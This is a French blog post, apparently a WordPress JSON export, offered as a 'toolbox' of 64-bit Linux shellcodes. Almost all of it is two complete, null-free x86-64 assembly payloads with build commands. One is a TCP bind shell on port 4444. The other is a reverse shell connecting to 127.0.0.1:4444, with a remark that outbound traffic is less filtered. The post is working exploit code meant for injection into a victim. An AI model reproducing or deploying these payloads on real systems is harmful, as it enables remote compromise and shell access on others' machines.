Cet article sert de bo\u00eete \u00e0 outils \u00e0 shellcodes.<\/p>\n
J’y mettrai au fil du temps toute une liste de shellcodes afin de servir des objectifs divers et vari\u00e9s.<\/p>\n
Le shellcode est envoy\u00e9 \u00e0 la victime et celle-ci \u00e9coute (bind) sur un port tcp (4444). L’attaquant initie la connexion vers la victime.<\/p>\n
Le code ci-dessous est \u00ab\u00a0exploit safe\u00a0\u00bb, il n’y a donc pas de z\u00e9ros dans les opcodes.<\/p>\n
; TCP Bind Shell - Exploit safe (no zeros in opcodes)\r\n; Listen port 4444\r\n;\r\n; nasm -f elf64 Bind-Shell-Safe.nasm -o Bind-Shell-Safe.o \r\n; ld Bind-Shell-Safe.o -o Bind-Shell-Safe\r\n\r\nglobal _start\r\n\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tmov al, 41\r\n\r\n\txor rdi, rdi\r\n\tmov dil, 2\r\n\t\r\n\txor rsi, rsi\r\n\tmov sil, 1\r\n\r\n\txor rdx, rdx\r\n\t\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = INADDR_ANY\r\n\t; bzero(&server.sin_zero, 8)\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax\r\n\r\n\tmov dword [rsp-4], eax\r\n\tmov word [rsp-6], 0x5c11\r\n\r\n\tmov word [rsp-8], 0x1FF\r\n\tsub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8\r\n\r\n\t; bind(sock, (struct sockaddr *)&server, sockaddr_len)\r\n\t; syscall number 49\r\n\r\n\txor rax, rax\r\n\tmov al, 49\t\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tmov dl, 16\t\r\n\r\n\tsyscall\r\n\r\n\t; listen(sock, MAX_CLIENTS)\r\n\t; syscall number 50\r\n\r\n\txor rax, rax\r\n\tmov al, 50\r\n\r\n\txor rsi, rsi\r\n\tmov sil, 2\r\n\t\r\n\tsyscall\r\n\r\n\t; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)\r\n\t; syscall number 43\r\n\t\r\n\txor rax, rax\r\n\tmov al, 43\r\n\r\n\tsub rsp, 16\r\n\tmov rsi, rsp\r\n mov byte [rsp-1], 16\r\n sub rsp, 1\r\n mov rdx, rsp\r\n\r\n syscall\r\n\r\n\t; store the client socket description \r\n\tmov r9, rax \r\n\r\n ; close parent\r\n\r\n\txor rax, rax\r\n\tmov al, 3\t\r\n\r\n syscall\r\n\r\n ; duplicate sockets\r\n\r\n ; dup2 (new, old)\r\n mov rdi, r9\r\n \r\n\txor rax, rax\r\n\tmov al, 33 \r\n\r\n\txor rsi, rsi\r\n\r\n syscall\r\n\r\n\txor rax, rax\r\n\tmov al, 33 \r\n\r\n\txor rsi ,rsi\r\n\tmov sil, 1\t\r\n\r\n syscall\r\n\r\n\txor rax, rax\r\n\tmov al, 33\r\n\r\n\txor rsi, rsi\r\n\tmov sil, 2\t\r\n\r\n syscall\r\n\r\n ; execve\r\n\r\n ; First NULL push\r\n\r\n xor rax, rax\r\n push rax\r\n\r\n ; push \/bin\/\/sh in reverse\r\n\r\n mov rbx, 0x68732f2f6e69622f\r\n push rbx\r\n\r\n ; store \/bin\/\/sh address in RDI\r\n\r\n mov rdi, rsp\r\n\r\n ; Second NULL push\r\n push rax\r\n\r\n ; set RDX\r\n mov rdx, rsp\r\n\r\n ; Push address of \/bin\/\/sh\r\n push rdi\r\n\r\n ; set RSI\r\n\r\n mov rsi, rsp\r\n\r\n ; Call the Execve syscall\r\n add rax, 59\r\n syscall<\/pre>\n
Le shellcode est envoy\u00e9 \u00e0 la victime et celle-ci initie la connexion vers l’attaquant (ici sur 127.0.0.1) sur un port tcp (4444). L’avantage est que les flux sortant sont moins filtr\u00e9s que les flux entrants.<\/p>\n
Le code ci-dessous est \u00ab\u00a0exploit safe\u00a0\u00bb, il n’y a donc pas de z\u00e9ros dans les opcodes.<\/p>\n
; TCP Reverse Shell - Exploit safe (no zeros in opcodes) \r\n; Connect on 127.0.0.1 on port 4444\r\n;\r\n; nasm -f elf64 Reverse-Shell-Safe.nasm -o Reverse-Shell-Safe.o\r\n; ld Reverse-Shell-Safe.o -o Reverse-Shell-Safe\r\n\r\nglobal _start\r\n\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\txor rax, rax\r\n\tadd al, 41\r\n\t\r\n\txor rdi, rdi\r\n\tinc dil\r\n\tinc dil\r\n\r\n\txor rsi, rsi\r\n\tinc sil\t\r\n\r\n\txor rdx, rdx\r\n\tsyscall\r\n\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\tmov rdi, rax\r\n\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = inet_addr(\"127.0.0.1\")\r\n\t; bzero(&server.sin_zero, 8)\r\n\r\n\txor rax, rax \r\n\r\n\tpush rax\r\n\t\r\n\t;mov dword [rsp-4], 0x0100007f\r\n\tmov dword [rsp -4], 0x9A999A18\r\n\tsub dword [rsp -4], 0x99999999\r\n\r\n\tmov word [rsp-6], 0x5c11\r\n\t\r\n\t;mov word [rsp-8], 0x2\r\n mov word [rsp-8], 0x1FF\r\n sub word [rsp-8], 0x1FD\r\n\r\n\tsub rsp, 8\r\n\r\n\r\n\t; connect(sock, (struct sockaddr *)&server, sockaddr_len)\r\n\t\r\n\txor rax, rax\r\n\tadd al, 42\r\n\r\n\tmov rsi, rsp\r\n\t\r\n\txor rdx, rdx\r\n\tadd dl, 16\t\r\n\r\n\tsyscall\r\n\r\n\r\n ; duplicate sockets\r\n\r\n ; dup2 (new, old)\r\n \r\n\txor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tsyscall\r\n\r\n xor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tinc sil\r\n\r\n\tsyscall\r\n\r\n xor rax, rax\r\n\tadd al, 33\r\n\r\n xor rsi, rsi\r\n\tinc sil\r\n\tinc sil\t\r\n\r\n\tsyscall\r\n\r\n\r\n ; execve\r\n\r\n ; First NULL push\r\n\r\n xor rax, rax\r\n push rax\r\n\r\n ; push \/bin\/\/sh in reverse\r\n\r\n mov rbx, 0x68732f2f6e69622f\r\n push rbx\r\n\r\n ; store \/bin\/\/sh address in RDI\r\n\r\n mov rdi, rsp\r\n\r\n ; Second NULL push\r\n push rax\r\n\r\n ; set RDX\r\n mov rdx, rsp\r\n\r\n ; Push address of \/bin\/\/sh\r\n push rdi\r\n\r\n ; set RSI\r\n\r\n mov rsi, rsp\r\n\r\n ; Call the Execve syscall\r\n add rax, 59\r\n syscall\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"Cet article sert de bo\u00eete \u00e0 outils \u00e0 shellcodes. J’y mettrai au fil du temps toute une liste de shellcodes afin de servir des objectifs divers et vari\u00e9s. TCP Bind Shell – Exploit Safe Le shellcode est envoy\u00e9 \u00e0 la victime et celle-ci \u00e9coute (bind) sur un port tcp (4444). L’attaquant initie la connexion vers … Continuer la lecture de Linux shellcode 64 bits – Toolbox<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-148","post","type-post","status-publish","format-standard","hentry","category-shellcode"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/148","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=148"}],"version-history":[{"count":9,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/148\/revisions"}],"predecessor-version":[{"id":164,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/148\/revisions\/164"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=148"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=148"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}